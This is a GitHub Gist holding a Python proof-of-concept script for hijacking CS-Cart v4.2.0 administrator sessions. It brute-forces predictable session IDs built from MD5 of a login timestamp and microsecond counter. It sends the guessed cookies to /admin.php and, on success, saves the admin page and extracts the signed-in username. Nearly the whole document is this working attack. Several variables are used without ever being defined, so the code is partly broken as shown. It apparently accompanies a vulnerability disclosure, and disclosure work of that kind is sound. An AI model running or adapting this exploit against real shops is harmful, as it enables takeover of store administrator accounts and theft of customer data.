Last active
February 25, 2017 03:43
-
-
Save nikcub/a0686e48ddeb943fd610 to your computer and use it in GitHub Desktop.
CS-Cart Session Brute Force Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# CS-Cart session brute force exploit for v4.2.0 | |
# see https://www.nikcub.com/posts/cs-cart-v4-2-0-session-hijacking-and-other-vulnerabilities/ | |
import sys | |
import requests | |
import argparse | |
import re | |
import string | |
import random | |
import hashlib | |
from BeautifulSoup import BeautifulSoup | |
target_host = "cscart.dev" | |
target_ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:20.0) Gecko/20100101 Firefox/20.0" | |
target_start_time = 1402325013 # timestamp seconds set to when link was clicked + 3-4 seconds for login. | |
# change nothing below. | |
session_name = False | |
session_value = False | |
cookies = {} | |
headers = { | |
"Host": target_host, | |
"User-Agent": target_ua, | |
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", | |
"Accept-Language": "en-US,en;q=0.5", | |
"Accept-Encoding": "gzip, deflate" | |
} | |
proxies = proxy_none | |
req_base = 'http://' + host | |
req_url = req_base + '/admin.php' | |
def extract_username(html_doc): | |
soup = BeautifulSoup(html_doc) | |
menu = soup.find("ul", "dropdown-menu pull-right").find("li").find("a") | |
if menu: | |
return re.search(r'<br />(.*?)</a>', str(menu), re.DOTALL).group(1).strip() | |
return 'Not Found' | |
def rand_string(n=5): | |
return ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(n)) | |
def save_doc(tid, txt): | |
f = open(tid + '_' + rand_string() + '.txt', 'w') | |
f.write(txt.encode('ascii', 'ignore')) | |
f.close() | |
def req_att(path, cookie): | |
cookies[session_name] = cookie | |
r = requests.get(req_base + path, headers=headers, allow_redirects=False) | |
def calc_session_name(host): | |
return hashlib.md5(host).hexdigest()[:5] | |
def gen_value(basetime, usec): | |
return hashlib.md5("%s%08x%05x" % (basetime, basetime, usec)).hexdigest() + "_0_A" | |
def req_generator(startat): | |
usec = 0 | |
startat = startat | |
while True: | |
r = gen_value(startat, usec) | |
usec += 1 | |
if (usec%10000) == 0: | |
# print progress every 100000 | |
print '.' | |
if usec >= 100000: | |
usec = 0 | |
startat += 1 | |
yield r | |
session_name = calc_session_name(req_base) | |
def fetch(cookie): | |
# cookies = {cookie_name, cookie} | |
headers['Cookie'] = cookie_name + '=' + cookie | |
try: | |
response = requests.request('GET', req_url, headers=headers, proxies=proxies, timeout=30.0, allow_redirects=False) | |
if response.status_code != 302: | |
print "FOUND: " + session_name + "=" + session_guess | |
save_doc(host + '_' + session_guess, "\n".join(r.headers) + "\n" + r.text) | |
print "Wrote file backup" | |
print "Signed in as: " + extract_username(r.text) | |
except Exception, e: | |
pass | |
for url in req_generator(target_start_time): | |
fetch(url) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment